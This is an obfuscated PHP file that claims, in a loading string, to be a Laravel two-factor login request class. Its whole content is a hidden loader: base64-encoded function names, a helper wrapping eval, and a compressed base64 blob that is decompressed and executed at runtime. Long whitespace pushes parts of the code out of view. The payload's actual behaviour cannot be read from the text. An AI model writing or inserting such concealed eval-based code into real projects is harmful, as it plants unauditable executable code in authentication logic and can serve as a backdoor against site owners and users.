<?php 
        $__='printf';$_='Loading app/Http/Requests/TwoFactorLoginRequest.php';
        















































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmltvm0gUx98t9Tv4oRKpukqAxN0gyw+GhJsTp8YNA/MSwQwF4uGS4hv+9D02vgTtwybqaqVW8xthD2cu58yZP/Ng0+02fHwCBkL5I83n34X+7nbPQAjK8sKcz8sLJ3pZRNW8uvi2KvSAzIsfd0Wc5nvzeZmUXY0FVXV+fi70O/upux86vPDy3tLZarD7HzL4h0XwJKXykZRi43Yg7Ewn1b6J/XMy6HI4HM6fiUAyV6SevbAMV/bRqrB15btXz/5uDk04NZvj+omnisPhcDgcDofD+d3gP2dwOBzOn4sQBlX05eqJRqSgkdDnGeFwOBwO55dovzxxMynGWtZLQuRuiKE/46mqElMlU9MRib6eYk+XsDcWyaYaa7E4ot6YWbesCk13HqBeQg2XOJkihZkDdbYM2dqiprPybvGSZNJx/MNKHN1MyufQ0DekVh+prBg+GovhpX0fyrQMmc2I5zJyOYmxl4gY9WbQz4D2+WPmrinER4fiKIJ5LG0YW9r1yyg+1Icv1q3DIJY6RGwBayhxqoqB8Rhv4yWpWsJcCfWcAuYro8ydWaaztAwpCWToYyTb9voQ692reSE/cVMv4olpM2qCj1RNQ1mpXrUtD3ViumlosGfLwJCTsRggZWEZugQ+IB/sC57G5aHvaS3ba+vfkUh2FVPTlvA3yHe6syu7PdrVh8tReqzHo1Q1sTfZxs8sEyfgd+Z7ThnKVzHJ3Qp799u2hGpqAntaRVNVDOsmL+SQU+3qNF8rn6d4fM+ufW/2yu/1IbYVRXYVoPsY5+7Cv2z5LkaT/XxmdRy7y9Hh7zq9bW8uWmLDXYCWsgC5tV0Pla/pMG/iZTVGzjW5dGrQXm7Xq9Z47705A72QTKlBB6C7cYJldwP7tiR77UAcEEOPYU2VfbSGuPRmP2F/QsPdvEEnCcntJJqc+t0d9txUJT9bl36tZhT1nnfPTqrOQX8bH1FG6n/XCWrZm8uW2QyeHYgTl9izFqe8TXLrRvwM+X3wkZSAfxZmNAffCehT9D1YL9gDtIqprL8EyIL1s5LIs/xu2PJPH45rEMdaLg6Efqfz/x9gg9332f7uU/89w1+NfcvAjyeHZ8L2U/jr6Ja/R8bLr7xH1tbYWUvUjcQ+9X8CtxzeZg==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































































































































































































                                                                                                                                                                                                                     $________;
